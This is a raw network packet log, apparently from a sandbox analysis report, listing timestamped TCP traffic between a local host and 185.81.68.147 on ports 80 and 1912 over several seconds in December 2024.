                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700462103 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700540066 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700655937 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700912952 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.700968027 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.701020956 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702759027 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702840090 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.702882051 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705094099 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705157042 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.705203056 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.706888914 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.706959963 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708069086 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708722115 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.708843946 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710649014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710727930 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.710787058 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712558985 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712620974 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.712661028 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714014053 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714427948 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714518070 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.714582920 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716310978 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716422081 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.716463089 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718242884 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718343973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.718419075 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.719954967 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.720077991 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721762896 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721824884 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.721905947 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723685026 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723764896 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.723866940 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.724009037 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726360083 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726480961 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.726537943 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727015972 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727123022 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.727174997 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.728883982 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.728920937 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.729334116 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.730505943 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.730618954 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732022047 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732238054 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.732444048 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734045029 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734101057 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734133959 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.734158039 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735831022 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735887051 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.735949993 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.737570047 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.737797976 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.738544941 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739264011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739342928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.739389896 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.740977049 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.741033077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.741084099 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.742686987 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.742820024 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744405031 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744851112 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.744976044 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746193886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746251106 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.746309996 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.747936010 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.747994900 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.748050928 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.748092890 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.749762058 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.749819040 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.750020981 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751478910 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751627922 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.751679897 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753196001 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753406048 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.753622055 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.754961967 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.755034924 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.755325079 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756644964 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756747961 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.756807089 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758373976 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758523941 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.758599043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.760204077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.760258913 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.760314941 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.761895895 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.761977911 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.762078047 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.763621092 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.763664007 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.763709068 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.765336037 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.765628099 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.765687943 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.767230988 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.767323971 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.767398119 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.768973112 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.769022942 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.769067049 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.770595074 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.770651102 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.770709991 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.772403955 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.772475004 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.772522926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.774111032 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.774187088 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.775259018 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.775820971 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.775990963 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.776098013 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.777571917 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.777689934 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.778507948 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.779413939 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.779484987 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.780431986 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.781101942 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.781127930 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.782788992 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.782850027 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.782900095 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.784054995 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.784678936 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.784785032 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.784830093 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.786277056 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.786423922 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.786469936 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.788000107 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.832276106 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892034054 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892064095 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892194033 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892584085 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892729044 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.892781019 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.893847942 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.949225903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.984893084 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.013618946 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.104773045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.160887003 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.280874014 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.280966997 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.281202078 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.401154995 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.401243925 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.430740118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.437884092 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.521342993 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.557943106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.557960987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.557982922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.557991028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.558039904 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.558048010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.022931099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.066653013 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.084242105 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205235958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205252886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205265999 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205301046 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205437899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205501080 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.205512047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206391096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206449986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206499100 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206543922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206605911 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206677914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206770897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206779003 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.206880093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.524238110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.532244921 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.652023077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.919783115 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.920032978 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.920234919 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.921016932 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.971434116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.973783970 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.036508083 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.040819883 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.093816042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.156435013 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.156574965 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.156919003 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.277614117 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.277745962 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.397432089 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.409388065 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.415303946 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.535249949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.850023985 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.851257086 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.972537994 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.294765949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.336637020 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.458307028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.606235981 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.606328011 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.606373072 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.608067036 CET4971680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.723351955 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.727818012 CET8049716185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.776418924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.799614906 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843183994 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843265057 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843328953 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.919409037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.963172913 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.963258028 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.084553003 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.237087011 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.240256071 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.360701084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.677354097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:21.725243092 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.451704025 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.451792955 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.453979969 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.477981091 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.587901115 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.600929022 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.710839033 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.713570118 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.713570118 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.794898987 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.833292007 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.833981991 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.917843103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.956082106 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.245104074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.245593071 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.366055965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.685065031 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.685905933 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:23.805675030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.128537893 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.159621000 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.355389118 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.355550051 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.356360912 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.356499910 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.458471060 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.476203918 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.580559015 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.581036091 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.581036091 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.700984001 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.701143026 CET4971980192.168.2.8185.81.68.147
